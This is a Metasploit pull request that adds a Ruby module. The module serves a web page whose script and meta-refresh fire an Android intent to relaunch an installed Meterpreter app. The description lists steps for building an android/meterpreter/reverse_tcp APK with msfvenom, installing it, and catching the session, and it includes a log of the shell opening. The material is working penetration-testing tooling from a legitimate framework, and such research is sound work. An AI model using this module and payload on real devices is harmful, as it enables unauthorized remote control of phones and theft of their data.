### PR TITLE
Add aux module to be able to open android meterpreter from a browser

### DIFF
--- a/modules/auxiliary/server/android_browsable_msf_launch.rb
+++ b/modules/auxiliary/server/android_browsable_msf_launch.rb
@@ -1,0 +1,53 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Android Meterpreter Browsable Launcher",
+      'Description'    => %q{
+        This module allows you to open an android meterpreter via a browser. An Android
+        meterpreter must be installed as an application beforehand on the target device
+        in order to use this.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'sinn3r' ],
+      'References'     =>
+        [
+          [ 'URL', 'http://developer.android.com/reference/android/content/Intent.html#CATEGORY_BROWSABLE' ]
+        ]
+    ))
+  end
+
+  def run
+    exploit
+  end
+
+  def html
+%Q|
+<html>
+<body>
+<script>
+location.href = "intent://my_host#Intent;scheme=metasploit;action=android.intent.action.VIEW;end";
+</script>
+<noscript>
+<meta http-equiv="refresh" content="1; url=intent://my_host#Intent;scheme=metasploit;action=android.intent.action.VIEW;end">
+</noscript>
+</body>
+</html>
+|
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending HTML...")
+    send_response(cli, html)
+  end
+
+end


### PR DESCRIPTION
This auxiliary module allows you to open an android meterpreter session again from a browser.

**To test this, you must make sure this is in master: https://github.com/rapid7/metasploit-payloads/pull/24**

And then you go ahead and do this: 
- [x] `./msfvenom -p android/meterpreter/reverse_tcp lhost=IP lport=4444 -o /tmp/android.apk`
- [x] Start an emulator
- [x] `tools/install_msf_apk.sh /tmp/android.apk` (this will install and open the payload)
- [x] Start a msfconsole
- [x] Start a listener for android/meterpreter/reverse_tcp. If you get a session, just exit it, and restart the listener again.
- [x] In msfconsole (either you start a new one or use the same one), do: `use auxiliary/server/android_browsable_msf_launch`
- [x] `set URIPATH /test`
- [x] `run`
- [x] Go back to the Android emulator, open the default browser. Looks like this:

<img width="364" alt="screen shot 2015-08-27 at 2 43 56 pm" src="https://cloud.githubusercontent.com/assets/1170914/9531201/40044924-4cca-11e5-8292-142737b89b4c.png">
- [ ] Go to the URL that android_browsable_msf_launch is serving
- [ ] The android payload listener should get a session:

```
msf exploit(handler) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (58381 bytes) to 192.168.1.64
[*] Meterpreter session 6 opened (192.168.1.64:4444 -> 192.168.1.64:51166) at 2015-08-27 14:36:07 -0500

meterpreter > 
```
